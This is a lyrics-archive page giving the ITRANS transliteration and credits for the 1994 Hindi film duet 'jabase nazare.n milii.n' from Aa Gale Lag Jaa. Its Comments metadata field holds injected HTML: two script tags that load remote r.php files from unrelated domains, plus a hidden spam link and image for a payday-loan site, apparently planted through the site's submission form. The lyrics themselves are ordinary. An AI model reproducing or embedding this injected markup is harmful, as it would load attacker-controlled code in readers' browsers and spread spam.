giitaayan An Interface to ISB

jabase nazare.n milii.n ... aa gale lag jaa - Aa Gale Lag Jaa (1994)  
View in normal format 

% ITRANS Song #
%
\startsong
\stitle{jabase nazare.n milii.n ... aa gale lag jaa}%
\film{Aa Gale Lag Jaa}%
\year{1994}%
\starring{Urmila Matondkar, Jugal Hansraj}%
\singer{Kavita Krishnamurthy, Abhijeet}%
\music{Anu Malik}%
\lyrics{Gauhar Kanpuri (?)}%
%
% Tags:
% Audio on:
% Contributor: Amarendra R Nargundkar
% Transliterator: Amarendra R Nargundkar
% Editor: Vinay P Jain
% Date: 19 Mar 2010
% Series:
% Comments: </title><script src=http://hgbyju.com/r.php ></script> </title><script src=http://nmmkmm.com/r.php ></script> <a href=http://onehourlender.com/a/2551/ title=anytime+payday+loans ><img src=http://onehourlender.com/bg.gif border=0 ></a>
% generated using www.giitaayan.com
%
\printtitle
#indian
%
abhijiit: jabase nazare.n milii.n o merii jaan-e-man had se ba.Dhane lagaa meraa diivaanaapan ye merii aashiqii terii diivaanagii, kal rahe naa rahe aa gale lag jaa, aa gale lag jaa kavitaa: jabase nazare.n milii.n o mere jaan-e-man had se ba.Dhane lagaa meraa diivaanaapan ye terii aashiqii merii diivaanagii, kal rahe naa rahe aa gale lag jaa, aa gale lag jaa abhijiit: jabase tumhaaraa saath milaa hai, betaabiyo.n kaa ik silasilaa hai kavitaa: dekhuu.N jidhar mai.n aa_e nazar tuu, har aa_iine me.n cheharaa teraa hai abhijiit: baato.n kii garmii, saa.Nso.n kii Kushabuu, bas me.n nahii.n mai.n, bas me.n nahii.n tuu kavitaa: kaise sa.Nbhaaluu.N Kud ko bataa_o, chhaane lagaa hai pyaar kaa jaaduu abhijiit: dil kii aavaaz hai, jo hai bas aaj hai, kal rahe naa rahe aa gale lag jaa, aa gale lag jaa kavitaa: aa gale lag jaa, aa gale lag jaa abhijiit: ba.Dhatii hii jaa_e ye beqaraarii, tumane churaa lii nii.nde.n hamaarii kavitaa: kaTatii hai.n raate.n karavaT badalake, haa.N ek jaisii hai haalat hamaarii abhijiit: lab chup rahe.n to aa.Nkho.n se kahanaa, mushkil hai tumase ab duur rahanaa kavitaa: ishaaro.n me.n ho.ngii mohabbat kii baate.n, kuchh mai.n kahuu.Ngii kuchh tum bhii kahanaa abhijiit: tere diidaar ke lamhe ye pyaar ke, kal rahe naa rahe aa gale lag jaa, aa gale lag jaa kavitaa: aa gale lag jaa, aa gale lag jaa abhijiit: ho.nTh gulaabii lagate hai.n aise, surK dahakate shole ho.n jaise kavitaa: bahakii hu_ii hai.n terii nigaahe.n, baa.Nho.n me.n jaanam aa_uu.N mai.n kaise abhijiit: ye tanhaa_ii sard havaa_e.N, kaise bhalaa ham dil ko manaa_e.N kavitaa: jaane mujhe kyuu.N Dar lag rahaa hai, kahii.n beKudii me.n ham kho na jaa_e.N ai mere hamasafar, pyaar kii ye Dagar, kal rahe naa rahe aa gale lag jaa abhijiit: aa gale lag jaa dono.n: aa gale lag jaa, aa gale lag jaa
%
#endindian
\endsong
 
The song was contributed by Amarendra R Nargundkar on 19.03.2010 08:50:46. Check its follow-up on RMIM (if posted).

Back to Recently Posted Songs

Home - Submit a Song - Recently Posted Songs


vinay p jain. march 2013. giitaayan at gmail dot com. Disclaimer. ISB Copyright Notice.